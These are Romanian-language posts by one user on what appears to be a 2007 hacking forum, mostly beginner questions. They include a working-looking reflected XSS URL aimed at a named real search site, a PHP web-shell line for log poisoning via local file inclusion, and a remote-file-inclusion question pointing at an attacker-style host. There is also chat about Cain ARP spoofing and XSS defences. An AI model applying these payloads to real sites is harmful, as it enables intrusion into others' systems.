michee

si tot nu inteleg ce este cu acel + din atack....daca rolul lui este purs si simplu de a delimita ultima " de la value de onmouseover la fel de bine poti folosit spatiu(%20) ca de exemplu. http://search.dir.bg/index.php?Cat=0&Forum=All_Forums&Match=Entire%20Phrase&Old=allposts&textfield="%20onmouseover="javascript:alert(1)">&x=0&y=0 Am eliminat o mare parte din link deoarece celelalte input-uri am observat ca iau aceeasi valoare din textinput, inainte de a se da submit la forma printr-o functie submit. ps: Am descoperit de ce nu mergea pe FF 2.0.0.8 la mine. Se pare ca de la extensia NOSCRIPT care are rolul de a proteja de atacurile XSS:)......se pare ca era setata sa sanitizeze automat requesturile dubioase. Deci ca tot vorbeam de metode de protectie asupra XSS....cred ca ar merge si aceasta extensie NOSCRIPT.

i'm back:) se pare ca nu merge pf FF 2.0.0.8 xss-ul ala cu onmouseover.....pe IE 6.0 XP cu sp2 mi-a mers...... e al 2lea xss postat pe aici ca nu merge pe FF 2.0.0.8, dupa cel cu paypal postat recent de nemessis.... ps: m-am uitat in sursa paginii la FF si vad ceva de genul <input name="textfield" type="text" class="prettysearch" value="" onmouseover "javascript alert 1 " "" style="width:330px;"> se pare ca FF face strip automat la (), <>, :,= .... gresesc cu ceva? Nu a mai patit nimeni?

si tot nu m-ai lamurit.....

da' MDCRACK sau cain e bun?

daca se poate sa ma lamuriti si pe mine remote code execution cred c-ar fi daca fac ceva de genul doc = <? system($_GET['cmd'])?> , imi logheaza asta intr-un loc apache si apoi folosesc LFI ca sa-l execut, nu ? RFI cum se face? merge sa includ un fisier remote daca fac doar doc='www.hackserver.com/cmd.php' de exemplu? adik fara http in fata? saum cum se face RFI aici?'

m-am uitat dar nu mai merge... daca am inteles eu bine.... modifici ce e in interior-ul unui tag <input......... > folosind js? Adik + -ul acela e operatorul de concatenare? si folosind-ul inchizi value="" (cu ghilemelee care le adaugi tu) si apoi adaugi xss-ul cu onmouseover...? am inteles bine?

stai putin ca nu inteleg ce-i cu + -urile alea. in ce context ar veni asta?

intrebare: Nu e suficient daca in functia crossFilter faci doar un strip_tags? Fara acele str_replace-uri? Intreb si eu sunt mai incepator...

da,frumos tutorial intr-adevar. cum poate sa te gaseasca ISP-ul?

chiar c-a sarit lumea-n cap:) Deci ce m-a deranjat pe moment a fost atitudinea lui x.o. dar mi-a trecut, nu o iau personal:)....multumesc lui d3v1l ptr c-a priceput lucrul asta. eu am intrebat doar ce scaneaza ala, adik ma interesa daca scaneaza vulnerabilitati de sql injection, de xss etc....

bine vere mai usor nu tre sa te agiti atata....ce-o mai fi insemnand si ROFLMAO.....ma interesa o scurta descriere,dar daca nu se poate era suficient sa zici ca nu se poate. ps: si daca tu zici ca-i de 2 ani eu vad ca postu e din 2007,luna octombrie,adik luna asta asa ca scuteste-ma.

ptr cine era interesat de cain....sunt mai multe tutoriale pe youtube. nu sunt toate la fel de bune, dar dupa ce urmarest vreo 4-5 te prinzi cum e si cu scan-ul de mac-uri , cu apr-ul si cu voip sniffing (pe care tre sa recunosc nu l-am inteles prea bine dar arata very interesting). Poate a a folosit careva Voip si poate da detalii?

se poate si o scurta descriere la script? Ca eu is mai mic si mai prost si nu inteleg nici limba perl nici limba spaniola....

da, la asta ma asteptam si eu tre sa recunosc.